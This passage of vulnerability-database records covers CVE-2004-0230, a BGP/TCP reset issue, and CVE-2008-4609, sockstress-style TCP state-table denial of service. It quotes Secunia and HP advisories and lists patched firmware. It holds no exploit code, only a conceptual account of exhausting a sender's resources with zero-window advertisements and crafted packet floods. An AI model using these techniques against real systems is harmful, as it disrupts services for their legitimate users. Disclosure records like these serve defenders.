            "url": "http://secunia.com/advisories/11458"
          },
          {
            "trust": 1.2,
            "url": "http://secunia.com/advisories/22341"
          },
          {
            "trust": 1.2,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20040403-01-a.asc"
          },
          {
            "trust": 1.2,
            "url": "http://www.vupen.com/english/advisories/2006/3983"
          },
          {
            "trust": 1.2,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/15886"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=108302060014745\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=108506952116653\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://xforce.iss.net/xforce/alerts/id/170"
          },
          {
            "trust": 0.8,
            "url": "http://www.uniras.gov.uk/niscc/docs/al-20040420-00199.html?lang=en"
          },
          {
            "trust": 0.8,
            "url": "http://www.niscc.gov.uk/niscc/docs/re-20040420-00391.pdf"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3562.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc2385.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc1323.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=4030"
          },
          {
            "trust": 0.8,
            "url": "http://www.ciac.org/ciac/bulletins/o-124.shtml"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0230"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/products/vulnerabilitydisclosures/default.aspx?id=va-20040420-00391.xml"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/wr/2004/wr041702.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/at/2004/at040003.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/niscc/niscc-236929/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta04-111a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta04-111a"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/docs/re-20040420-00391.pdf?lang=en"
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/15886"
          },
          {
            "trust": 0.8,
            "url": "http://www.isskk.co.jp/support/techinfo/general/tcp_170.html"
          },
          {
            "trust": 0.6,
            "url": "http://www.cisco.com/en/us/products/products_security_advisory09186a008021ba2f.shtml"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/7605"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.1795/"
          },
          {
            "trust": 0.4,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2005-097_scasa-2005-14.pdf"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0230"
          },
          {
            "trust": 0.3,
            "url": "http://www.seil.jp/en/ann/announce_en_20040421_01.txt"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-217.htm"
          },
          {
            "trust": 0.3,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1iy55949"
          },
          {
            "trust": 0.3,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1iy55950"
          },
          {
            "trust": 0.3,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1iy62006"
          },
          {
            "trust": 0.3,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx"
          },
          {
            "trust": 0.3,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms06-064.mspx"
          },
          {
            "trust": 0.3,
            "url": "http://www.bluecoat.com/support/knowledge/advisory_tcp_can-2004-0230.html"
          },
          {
            "trust": 0.3,
            "url": "http://securityresponse.symantec.com/avcenter/security/content/2005.05.02.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.juniper.net/support/alert.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.checkpoint.com/techsupport/alerts/tcp_dos.html"
          },
          {
            "trust": 0.3,
            "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:19.tcp.asc"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/101006870"
          },
          {
            "trust": 0.3,
            "url": "https://www.alienvault.com/forums/discussion/5706/security-advisory-alienvault-v5-1-addresses-6-vulnerabilities"
          },
          {
            "trust": 0.2,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml."
          },
          {
            "trust": 0.2,
            "url": "http://www.cisco.com/warp/public/707/"
          },
          {
            "trust": 0.2,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml."
          },
          {
            "trust": 0.2,
            "url": "http://www.cisco.com/go/psirt."
          },
          {
            "trust": 0.2,
            "url": "http://www.cisco.com."
          },
          {
            "trust": 0.2,
            "url": "http://www.cisco.com/warp/public/687/directory/dirtac.shtml"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=108302060014745\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10053"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=108506952116653\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/vulnerabilities/tcp-seq-num-approximation"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/gabrieljcs/ips-assessment-reports"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/24033/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/about_secunia_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/11440/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/4586/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_vacancies/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/15263/"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/415294#systems."
          },
          {
            "trust": 0.1,
            "url": "http://www.uniras.gov.uk/vuls/2004/236929/index.htm\u003e."
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/498440)"
          },
          {
            "trust": 0.1,
            "url": "http://www.uniras.gov.uk/vuls/2004/236929/index.htm)"
          },
          {
            "trust": 0.1,
            "url": "http://www.cert.org/advisories/ca-2001-09.html\u003e),"
          },
          {
            "trust": 0.1,
            "url": "http://www.cymru.com/\u003e)."
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/bgp.htm\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/en/us/products/sw/iosswrel/"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc0793.txt."
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/en/us/products/sw/iosswrel/ps1835"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/en/us/products/sw/iosswrel/ps1828/"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml,"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml,"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/en/us/products/sw/iosswrel/ps1835/"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc0793.txt"
          },
          {
            "trust": 0.1,
            "url": "http://www.qorbit.net/documents/junos-bgp-template.pdf\"\u003ehttp://www.qorbit.net/documents/junos-bgp-template.pdf"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org\"\u003ethe"
          },
          {
            "trust": 0.1,
            "url": "http://www.cymru.com/documents/ip-stack-tuning.html\"\u003ehttp://www.cymru.com/documents/ip-stack-tuning.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.polycom.com/securitycenter\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.cymru.com/documents/secure-bgp-template.html\"\u003ehttp://www.cymru.com/documents/secure-bgp-template.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.cymru.com/documents/secure-bgp-template.html\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc793.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cve\"\u003ecve\u003c/a\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc2827.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc3682.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.osvdb.org\"\u003eopen"
          },
          {
            "trust": 0.1,
            "url": "http://www.uniras.gov.uk/vuls/2004/236929/index.htm\"\u003ehttp://www.uniras.gov.uk/vuls/2004/236929/index.htm\u003c/a\u003e\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc0793.txt\"\u003erfc"
          },
          {
            "trust": 0.1,
            "url": "http://www.niscc.gov.uk/aboutniscc/index.htm\"\u003ehttp://www.niscc.gov.uk/aboutniscc/index.htm\u003c/a\u003e\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc1323.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.niscc.gov.uk/bgp%20filtering%20guide.pdf\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=4030\"\u003e4030\u003c/a\u003e.\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.qorbit.net/documents/junos-bgp-template.pdf\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.niscc.gov.uk/images/newtitle.gif\""
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc1323.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc3562.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml\"\u003ehttp://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.cymru.com/documents/secure-bgp-template.html\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0230\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc3562.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.sans.org/y2k/egress.htm\"\u003ehttp://www.sans.org/y2k/egress.htm\u003c/a\u003e.\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.sans.org/y2k/egress.htm\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.niscc.gov.uk/bgp"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc2385.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.polycom.com/securitycenter\u003c/a\u003e.\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.cymru.com/documents/ip-stack-tuning.html\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.niscc.gov.uk/bgp%20filtering%20guide.pdf\"\u003ehttp://www.niscc.gov.uk/bgp"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc1771.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.uniras.gov.uk/uniras.asc\"\u003ehttp://www.uniras.gov.uk/uniras.asc\u003c/a\u003e.\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0230\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0230\"\u003ecan-2004-0230\u003c/a\u003e.\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc2385.txt\"\u003erfc"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc2385.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc1323.txt\"\u003erfc"
          },
          {
            "trust": 0.1,
            "url": "http://www.checkpoint.com/techsupport/alerts/tcp_dos.html\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.seil.jp/en/ann/announce_en_20040421_01.txt\u003c/a\u003e.\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc793.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.jpcert.or.jp\"\u003ejpcert/cc\u003c/a\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc2827.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc2827.txt\"\u003erfc"
          },
          {
            "trust": 0.1,
            "url": "http://www.iniche.com\"\u003ewww.iniche.com\u003c/a\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=4030\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.seil.jp/en/ann/announce_en_20040421_01.txt\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.qorbit.net/documents/junos-bgp-template.pdf\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.sans.org/y2k/egress.htm\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=4030\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.checkpoint.com/techsupport/alerts/tcp_dos.html\u003c/a\u003e.\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc1771.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml\"\u003ehttp://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml\u003c/a\u003e\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc3682.txt\u003c/a\u003e\u003c/td\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/rfc/rfc3562.txt\"\u003erfc"
          },
          {
            "trust": 0.1,
            "url": "http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\"\u003ehttp://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\u003c/a\u003e\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.cymru.com/documents/ip-stack-tuning.html\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://www.juniper.net/support\"\u003ehttps://www.juniper.net/support\u003c/a\u003e."
          },
          {
            "trust": 0.1,
            "url": "http://www.jpcert.or.jp/at/2004/at040003.txt\"\u003ehttp://www.jpcert.or.jp/at/2004/at040003.txt\u003c/a\u003e.\u003c/font\u003e\u003c/i\u003e\u003cbr\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0230\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/\u003e."
          },
          {
            "trust": 0.1,
            "url": "http://www.freebsd.org/handbook/kernelconfig.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-14:19/tcp.patch"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-14:19/tcp.patch.asc"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-14:19.tcp.asc\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0230"
          },
          {
            "trust": 0.1,
            "url": "http://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#415294"
          },
          {
            "db": "VULHUB",
            "id": "VHN-8660"
          },
          {
            "db": "VULMON",
            "id": "CVE-2004-0230"
          },
          {
            "db": "BID",
            "id": "10183"
          },
          {
            "db": "PACKETSTORM",
            "id": "37558"
          },
          {
            "db": "PACKETSTORM",
            "id": "33143"
          },
          {
            "db": "PACKETSTORM",
            "id": "33160"
          },
          {
            "db": "PACKETSTORM",
            "id": "33159"
          },
          {
            "db": "PACKETSTORM",
            "id": "33152"
          },
          {
            "db": "PACKETSTORM",
            "id": "128284"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150"
          },
          {
            "db": "NVD",
            "id": "CVE-2004-0230"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#415294",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-8660",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2004-0230",
            "ident": null
          },
          {
            "db": "BID",
            "id": "10183",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "37558",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "33143",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "33160",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "33159",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "33152",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "128284",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2004-0230",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2004-04-20T00:00:00",
            "db": "CERT/CC",
            "id": "VU#415294",
            "ident": null
          },
          {
            "date": "2004-08-18T00:00:00",
            "db": "VULHUB",
            "id": "VHN-8660",
            "ident": null
          },
          {
            "date": "2004-08-18T00:00:00",
            "db": "VULMON",
            "id": "CVE-2004-0230",
            "ident": null
          },
          {
            "date": "2004-04-20T00:00:00",
            "db": "BID",
            "id": "10183",
            "ident": null
          },
          {
            "date": "2005-05-29T20:22:44",
            "db": "PACKETSTORM",
            "id": "37558",
            "ident": null
          },
          {
            "date": "2004-04-23T05:59:41",
            "db": "PACKETSTORM",
            "id": "33143",
            "ident": null
          },
          {
            "date": "2004-04-22T07:16:00",
            "db": "PACKETSTORM",
            "id": "33160",
            "ident": null
          },
          {
            "date": "2004-04-22T07:14:00",
            "db": "PACKETSTORM",
            "id": "33159",
            "ident": null
          },
          {
            "date": "2004-04-22T02:04:00",
            "db": "PACKETSTORM",
            "id": "33152",
            "ident": null
          },
          {
            "date": "2014-09-17T15:58:15",
            "db": "PACKETSTORM",
            "id": "128284",
            "ident": null
          },
          {
            "date": "2004-08-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200408-159",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2004-000150",
            "ident": null
          },
          {
            "date": "2004-08-18T04:00:00",
            "db": "NVD",
            "id": "CVE-2004-0230",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2006-05-01T00:00:00",
            "db": "CERT/CC",
            "id": "VU#415294",
            "ident": null
          },
          {
            "date": "2018-10-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-8660",
            "ident": null
          },
          {
            "date": "2018-10-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2004-0230",
            "ident": null
          },
          {
            "date": "2015-08-12T22:24:00",
            "db": "BID",
            "id": "10183",
            "ident": null
          },
          {
            "date": "2020-05-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200408-159",
            "ident": null
          },
          {
            "date": "2015-01-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2004-000150",
            "ident": null
          },
          {
            "date": "2025-05-02T16:40:41.530000",
            "db": "NVD",
            "id": "CVE-2004-0230",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "33143"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "_id": null,
        "data": "The Border Gateway Protocol relies on persistent TCP sessions without specifying authentication requirements",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#415294"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200810-0010

    Vulnerability from variot - Updated: 2026-03-09 22:39

    The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. Part of the Transmission Control Protocol (TCP) specification (RFC 1122) allows a receiver to advertise a zero byte window, instructing the sender to maintain the connection but not send additional TCP payload data. The sender should then probe the receiver to check if the receiver is ready to accept data. Narrow interpretation of this part of the specification can create a denial-of-service vulnerability. By advertising a zero receive window and acknowledging probes, a malicious receiver can cause a sender to consume resources (TCP state, buffers, and application memory), preventing the targeted service or system from handling legitimate connections. Transmission Control Protocol (TCP) Multiple implementations of service disruption (DoS) Vulnerabilities exist. RFC793 It is prescribed by Transmission Control Protocol (TCP) Implementation of service disruption due to misuse of available resources after connection establishment (DoS) Vulnerabilities exist.Service operation disrupted by a remote third party (DoS) There is a possibility of being attacked. The core TCP/IP protocol is prone to multiple remote denial-of-service vulnerabilities. The issues are tracked by Cisco Bug IDs CSCsv04836, CSCsv07712, CSCsv66169, CSCsv02768, CSCsv08325, and CSCsv08579. These issues are reported to affect multiple vendors' implementations of the TCP/IP stack. ----------------------------------------------------------------------

    Do you have VARM strategy implemented?

    (Vulnerability Assessment Remediation Management)

    If not, then implement it through the most reliable vulnerability intelligence source on the market.

    Implement it through Secunia.

    For more information visit: http://secunia.com/advisories/business_solutions/

    Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


    TITLE: Windows 2000 TCP/IP Window Size Denial of Service Vulnerabilities

    SECUNIA ADVISORY ID: SA36597

    VERIFY ADVISORY: http://secunia.com/advisories/36597/

    DESCRIPTION: Two vulnerabilities have been reported in Microsoft Windows 2000, which can be exploited by malicious people to cause a DoS (Denial of Service).

    1) An error in the TCP/IP processing can be exploited to cause a system to stop responding to new requests by flooding it using specially crafted packets with a TCP receive window size set to a very small value or zero.

    2) An error in the TCP/IP processing can be exploited to cause connections to hang indefinitely in a FIN-WAIT-1 or FIN-WAIT-2 state. This can be exploited to cause a system to stop responding to new requests by flooding it using specially crafted packets with a TCP receive window size set to a very small value or zero.

    SOLUTION: According to the vendor, no patches will be made available as it would require re-architecting a significant amount of the OS.

    PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Jack C. Louis, Outpost24. 2) The vendor credits Felix Lindner, Recurity Labs.

    ORIGINAL ADVISORY: MS09-048 (KB967723): http://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/advisories/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c01923093 Version: 1

    HPSBMI02473 SSRT080138 rev.1 - Cisco Catalyst Blade Switch 3020/3120, Remote Denial of Service (DoS)

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2009-11-17 Last Updated: 2009-11-17

    Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS)

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY A potential vulnerability has been identified with the Cisco Catalyst Blade Switch 3020/3021. The vulnerability could be exploited remotely to create a Denial of Service (DoS).

    References: CVE-2008-4609, Cisco Security Advisory: TCP State Manipulation Denial of Service Vulnerabilities in Multiple Cisco Products(cisco-sa-20090908-tcp24)

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Cisco Catalyst Blade Switch 3020 for c-Class BladeSystem running firmware earlier than v12.2(50) Cisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP running firmware earlier than v12.2(50)

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2008-4609 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

    RESOLUTION

    HP has provided firmware updates to resolve this vulnerability.

    Product Firmware Version

    Cisco Catalyst Blade Switch 3020 for c-Class BladeSystem 12.2(50) SE1 or subsequent

    Cisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP 12.2(50) SE1 or subsequent

    To Locate the Firmware Update

    Browse to http://www.hp.com and do the following:

    Select "Support & Drivers" In Step 1 select "Download drivers and software (and firmware)" In Step 2 enter "Cisco Catalyst Blade Switch" Click on "Go" Select the desired product Select the desired Windows operating system Click on "Firmware - Blade Infrastructure"

    PRODUCT SPECIFIC INFORMATION None

    HISTORY Version:1 (rev.1) - 17 November 2009 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

